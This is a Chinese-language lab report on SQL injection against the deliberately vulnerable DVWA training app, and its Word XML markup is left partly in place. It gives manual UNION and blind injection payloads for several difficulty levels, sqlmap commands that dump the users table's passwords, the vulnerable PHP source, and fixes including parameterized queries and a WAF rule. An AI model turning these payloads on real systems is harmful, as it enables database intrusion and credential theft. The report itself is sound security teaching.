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DVWA SQL注入漏洞分析报告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文档主要内容：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1.漏洞原理（SQL注入流程）。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2.复现步骤（截图 + Payload）。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3.修复建议（参数化查询、WAF规则）。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SQL 注入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原理：用户输入的数据被 SQL 解释器执行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SQL注入的流程：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14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复现步骤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靶场：dvwa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工具：burpsuite community,浏览器，sqlmap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在登陆 dvwa 时进行抓包：可以看到 POST 方法中传到服务器的有 username 和 password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56483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行注释：--，#：省略注释后面的部分，不必担心输入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内联注释：/*...*/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SQL Injection-low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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正常提交 payload=1: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28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Union 注入（通过使用 UNION 关键字，将两个或多个查询结果合并为一个结果集）：</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>注入点判断，是数字注入还是字符串注入：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 and 1=1#正常输出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716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 and 1=2#，依旧正常输出：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192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总结：不是数字注入，因为没有产生异常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1’and1=2#（这里输入的’是中文符号，应该输入英文符号，则不输出）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68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1'and1=1#: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002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总结存在字符注入，且为单引号闭合，猜测 sql 语句：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Select ID,First name,Surname,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from　．．．,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ｗhere ID='input()';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字段判断：输入 1' order by 2#--&gt;对查询结果按指第二列排序，如果指定的列号超过实际字段数，则报错，否则正常输出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95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1’order by 3#，报错，则每一行有两个字段，First name 按字段输出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获取数据库名，使用 UNION 连接其他语句，例如：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1' union select 1,database() from information_schema.schemata#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19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假设实际的执行语句为：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  id, first_name, last_name</w:t>
              <w:br/>
              <w:t xml:space="preserve">   FROM users</w:t>
              <w:br/>
              <w:t xml:space="preserve">   WHERE id = '1' </w:t>
              <w:br/>
              <w:t xml:space="preserve">   UNION </w:t>
              <w:br/>
              <w:t xml:space="preserve">   SELECT 1,database(), #1是占位符，匹配原查询的列数，比如：原查询返回三列，并且返回当前的数据库名称</w:t>
              <w:br/>
              <w:t xml:space="preserve">   FROM information_schema.schemata -- ';#该表存储所有数据库的元信息</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>结果进行了填充默认值，导致First name显示1，surname显示dvwa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#获取表名：</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1' union select 1，table_name from information_schema.tables where table_schema='dvwa'#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478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 dvwa 库有两个表：guestbook，users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 users 表的列名：输入 1' union select* from users#（行不通，因为 union 要求前面查询和后面查询返回列数一致，可能 users 表的返回列数大于三，若用户没有访问 users 表的权限，则更加行不通了）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#获取列名</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1' union select column_name, column_name from information_schema.columns where table_name='users'and table_schema='dvwa'#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576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#获取 user，和 password :</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1' union select user， password from users#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624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查看源码进行分析：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PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;?php</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   if( isset( $_REQUEST[ 'Submit' ] ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get input</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $id = $_REQUEST[ 'id' ];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Check database</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $query  = "SELECT first_name, last_name FROM   users WHERE user_id = '$id';";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $result =   mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '&lt;pre&gt;' .   ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"])   : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) .   '&lt;/pre&gt;' );</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get results</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while( $row = mysqli_fetch_assoc(   $result ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Get values</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $first =   $row["first_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $last  = $row["last_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Feedback for end user</w:t>
              <w:br/>
              <w:t xml:space="preserve">        echo "&lt;pre&gt;ID:   {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname:   {$last}&lt;/pre&gt;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">      mysqli_close($GLOBALS["___mysqli_ston"]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">   }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> 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?&gt; </w:t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PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;?php</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   if( isset( $_REQUEST[ 'Submit' ] ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get input</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $id = $_REQUEST[ 'id' ];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Check database</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $query  = "SELECT first_name, last_name FROM   users WHERE user_id = '$id';";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $result =   mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '&lt;pre&gt;' .   ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"])   : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) .   '&lt;/pre&gt;' );</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get results</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while( $row = mysqli_fetch_assoc(   $result ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Get values</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $first =   $row["first_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $last  = $row["last_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Feedback for end user</w:t>
              <w:br/>
              <w:t xml:space="preserve">        echo "&lt;pre&gt;ID:   {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname:   {$last}&lt;/pre&gt;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">      mysqli_close($GLOBALS["___mysqli_ston"]);</w:t>
              <w:br/>
              <w:t xml:space="preserve">   }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> 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?&gt;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没有进行预编译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用户数据拼接了代码，没有实现代码、数据分离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没有进行敏感字符过滤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SQL Injection-medium</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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只能选择数据：进行抓包尝试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3050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384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输入：3 and 1=1#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&lt;pre&gt;ID:   3 and 1=1#</w:t>
              <w:br/>
              <w:t>&lt;br /&gt;First name: Hack&lt;br /&gt;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Surname: Me&lt;/pre&gt;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id=3 and 1=2#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没有回显，则存在数字型注入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猜测 sql 语句为：因为查询结果只有两列（输入 3 order by 3--&gt;出错）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select   First name,Surname </w:t>
              <w:br/>
              <w:t xml:space="preserve">   from &lt;表名&gt;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where id = 3;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 union 进行联合注入：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id=3   </w:t>
              <w:br/>
              <w:t xml:space="preserve">   union </w:t>
              <w:br/>
              <w:t xml:space="preserve">   select 1,database()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from information_schema.schemata#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说明当前的数据库为 dvwa，接下来查看数据库中有哪些表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 union select 1，table_name from information_schema.tables where table_schema='dvwa'#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报错 use near '\'dvwa\'#' at line 1，单引号被转义，要将字符'dvwa'转化为 16 进制数 0x64767761,再次输入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 union select 1，table_name from information_schema.tables where table_schema=0x64767761#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431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 guestbook 表格感兴趣，则查找其中有哪些列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 union select 1，column_name from information_schema.columns</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>where table_schema=0x64767761 and table_name=0x6775657374626f6f6b#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回显成功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957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如果对 guestbook 表格中 comment_id 和 comment 感兴趣则可以输入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 union select comment,comment_id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from guestbook#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288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查看源码进行分析：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&lt;?php</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   if( isset( $_POST[ 'Submit' ] ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get input</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $id = $_POST[ 'id' ];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    $id =   mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    $query  = "SELECT first_name, last_name FROM   users WHERE user_id = $id;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $result =   mysqli_query($GLOBALS["___mysqli_ston"], $query) or die(   '&lt;pre&gt;' . mysqli_error($GLOBALS["___mysqli_ston"]) .   '&lt;/pre&gt;' );</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get results</w:t>
              <w:br/>
              <w:t xml:space="preserve">    while( $row = mysqli_fetch_assoc(   $result ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Display values</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $first =   $row["first_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve">        $last  = $row["last_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">        // Feedback for end user</w:t>
              <w:br/>
              <w:t xml:space="preserve">        echo "&lt;pre&gt;ID:   {$id}&lt;br /&gt;First name: {$first}&lt;br /&gt;Surname:   {$last}&lt;/pre&gt;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   }</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   // This is used later on in the index.php page</w:t>
              <w:br/>
              <w:t xml:space="preserve">   // Setting it here so we can close the database connection in here like in   the rest of the source scripts</w:t>
              <w:br/>
              <w:t xml:space="preserve">   $query  = "SELECT COUNT(*) FROM   users;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">   $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '&lt;pre&gt;' .   ((is_object($GLOBALS["___mysqli_ston"])) ?   mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res =   mysqli_connect_error()) ? $___mysqli_res : false)) . '&lt;/pre&gt;' );</w:t>
              <w:br/>
              <w:t xml:space="preserve">   $number_of_rows = mysqli_fetch_row( $result )[0];</w:t>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
              <w:br/>
              <w:t xml:space="preserve">   mysqli_close($GLOBALS["___mysqli_ston"]);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?&gt; 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没有进行预编译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用户数据拼接了代码，没有实现代码、数据分离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没有很好的对敏感关键字进行过滤。想要利用 mysqli_real_escape_string 函数进行敏感字符过滤，但是 mysqli_real_escape_string 函数并不能过滤一些敏感的关键字（如 and or 等），它的功能只是转义一些字符，仅成功过滤了’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SQL Injection-high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2'，出错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3 and 1=2#，正常输出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3'and1=2#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第三种情况无回显（注意引号一定是英文引号，要不然没反应），说明是字符型注入，以单引号闭合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字符段长度判断 1'order by 2#：正常 1'order by 3#：出错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判断数据库 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3' union select 1，database（）from information_schema.schemata#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287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和初级一样，接下来查找表名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3' union select 1,table_name from information_schema.tables where table_schema='dvwa'#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002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查找表 users 的列名：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3' union select 1 ,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#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387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查看源码：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PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>&lt;?php</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">   if( isset( $_SESSION [ 'id' ] ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // Get input，相比其他等级改变的地方，session是用于验证用户身份，无法防御已认证用户的注入行为</w:t>
              <w:br/>
              <w:t xml:space="preserve">    $id = $_SESSION[ 'id' ];</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    switch ($_DVWA['SQLI_DB']) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        case MYSQL:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            // Check database</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $query  = "SELECT first_name, last_name FROM   users WHERE user_id = '$id' LIMIT 1;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">            $result =   mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die(   '&lt;pre&gt;Something went wrong.&lt;/pre&gt;' );</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            // Get results</w:t>
              <w:br/>
              <w:t xml:space="preserve">            while( $row =   mysqli_fetch_assoc( $result ) ) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                // Get values</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $first =   $row["first_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $last  = $row["last_name"];</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                // Feedback for end   user</w:t>
              <w:br/>
              <w:t xml:space="preserve">                echo   "&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br   /&gt;Surname: {$last}&lt;/pre&gt;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            ((is_null($___mysqli_res =   mysqli_close($GLOBALS["___mysqli_ston"]))) ? false :   $___mysqli_res);        </w:t>
              <w:br/>
              <w:t xml:space="preserve">            break;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        case SQLITE:</w:t>
              <w:br/>
              <w:t xml:space="preserve">            global   $sqlite_db_connection;</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            $query  = "SELECT first_name, last_name FROM   users WHERE user_id = '$id' LIMIT 1;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">            #print $query;</w:t>
              <w:br/>
              <w:t xml:space="preserve">            try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                $results =   $sqlite_db_connection-&gt;query($query);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            } catch (Exception $e) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                echo 'Caught exception:   ' . $e-&gt;getMessage();</w:t>
              <w:br/>
              <w:t xml:space="preserve">                exit();</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">            if ($results) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                while ($row =   $results-&gt;fetchArray()) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    // Get values</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    $first =   $row["first_name"];</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    $last  = $row["last_name"];</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">                    // Feedback for end   user</w:t>
              <w:br/>
              <w:t xml:space="preserve">                    echo   "&lt;pre&gt;ID: {$id}&lt;br /&gt;First name: {$first}&lt;br   /&gt;Surname: {$last}&lt;/pre&gt;";</w:t>
              <w:br/>
              <w:t xml:space="preserve">                }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            } else {</w:t>
              <w:br/>
              <w:t xml:space="preserve">                echo "Error in   fetch ".$sqlite_db-&gt;lastErrorMsg();</w:t>
              <w:br/>
              <w:t xml:space="preserve">            }</w:t>
              <w:br/>
              <w:t xml:space="preserve">            break;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">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?&gt;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没有进行预编译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用户数据拼接了代码，没有实现代码、数据分离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想要利用 session 和自定义错误返回来增加安全系数，成功的躲过了 Error 注入方式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SQL Injection (Blind)-low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1'报错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 and 1=2#，不报错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 1' and1=2#，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User ID is MISSING from the database.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则说明存在字符型注入，闭合为单引号，判断列数，不能使用 order by 进行分组，说明只是执行校验功能。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获取数据库名使用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length（database（））&gt;3#，不报错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1' and length(database())&gt;4# 报错：User ID is MISSING from the database。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说明数据库名字为四个字符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依次判断四个字符：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 sqlmap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-u"http://localhost/DVWA/vulnerabilities/sqli_blind/?id=2&amp;Submit=Submit#"   --cookie" PHPSESSID=5srr3gl4j9l0h83gv92aggrnd0; security=low"   --current-db</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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检测存在注入漏洞类型：存在基于布尔型的盲注漏洞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   "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"   --cookie "security=low; PHPSESSID=sglkdapflbtotcoq7968mm92ib "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049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#获取当前数据库名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 "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"   --cookie "security=low; PHPSESSID=sglkdapflbtotcoq7968mm92ib "   --current-db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478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获取数据库 dvwa 中的表格名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   "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"   --cookie "security=low; PHPSESSID=sglkdapflbtotcoq7968mm92ib " -D   dvwa --tables​</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#dvwa不用加引号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4003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获取数据库 dvwa 中 users 表的字段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   "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"   --cookie "security=low; PHPSESSID=sglkdapflbtotcoq7968mm92ib " -D   dvwa -T users --columns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9095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读取其中 user，和 password 中的内容：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 "http://localhost/DVWA/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit"   --cookie "PHPSESSID=siggre297upbpegrm1tfnl52ft; security=low " -D   dvwa -T users -C " user,password" --dump</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#使用dump强制把查询到的数据返回到终端，让我们自己可以在终端看见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240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SQL Injection(Blind)-medium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相比于 low 级别，需要找到请求体里面发送的内容，包含在命令行中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使用下拉框，没有回显，url 里面没有附带数据是使用 post 方法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sqlmap 分析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-u"http://localhost/dvwa/vulnerabilities/sqli_blind/#"   --cookie "PHPSESSID=siggre297upbpegrm1tfnl52ft; security=medium"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144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post 方法的数据是包含在请求体里面的，我们要把数据从数据包里取出来，加在命令行中。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构建新的命令行：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python   sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli_blind/# "   --data "id=1&amp;Submit=Submit" --cookie "PHPSESSID=3gbc1h6ma83bbe4fv38j3lgsm5; security=medium"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可以看到存在基于布尔类型的盲注和基于时间的盲注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668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之后查找数据即可，一定要加上 data：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SQL Injection(high)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 burpsuite 抓包，我们可以看到原页面跳转到另一个页面是使用 get 方法，跳转页面使用 post 获得参数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385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我们开始构造命令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#联合查询命令,-u   "[数据提交页面url]" --data   "[request]"  --second-u   "[数据显示页面url]" --cookie="[站点cookie]" </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>python sqlmap.py -u   "http://localhost/dvwa/vulnerabilities/sqli_blind/cookie-input.php#"   --data "id=1&amp;Submit=Submit"    --second-u   "http://localhost/dvwa/vulnerabilities/sqli_blind/" --cookie   "id=1; PHPSESSID=3gbc1h6ma83bbe4fv38j3lgsm5; security=high"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这个花费的时间可能比较久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9065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拿到注入点就可以进行数据的输出，之后就是和之前是一样的步骤。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b w:val="true"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>修复建议：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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1.参数化查询：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将用户输入和sql语句分离，避免拼接字符串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# 错误方式（拼接字符串）  </w:t>
              <w:br/>
              <w:t xml:space="preserve">cursor.execute("SELECT * FROM users WHERE id = " + user_input)  </w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve"># 正确方式（参数化查询）  </w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>cursor.execute("SELECT * FROM users WHERE id = ?", (user_input,))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2.WAF规则配置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过滤恶意字符：在WAF中设置规则，拦截包含sql关键字的请求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PHP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SecRule ARGS "@rx (?i)(union\s+select|sleep\(|-- |\/\*)" \</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>"id:1001,deny,msg:'SQL Injection Attempt'"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263643">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263644">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263645">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263646">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263647">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263648">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263649">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263650">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263651">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263652">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263653">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263654">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263655">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1263656">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="1263643"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="1263644"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="1263645"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="1263646"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1263647"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="1263648"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1263649"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1263650"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="1263651"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="1263652"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="1263653"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="1263654"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="1263655"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="126365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gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId11" Target="media/image7.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId12" Target="media/image8.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId13" Target="media/image9.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId14" Target="media/image10.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId15" Target="media/image11.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId16" Target="media/image12.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId17" Target="media/image13.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId18" Target="media/image14.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId19" Target="media/image15.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId2" Target="styles.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/><Relationship Id="rId20" Target="media/image16.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId21" Target="media/image17.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId22" Target="media/image18.gif" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId23" Target="media/image19.gif" 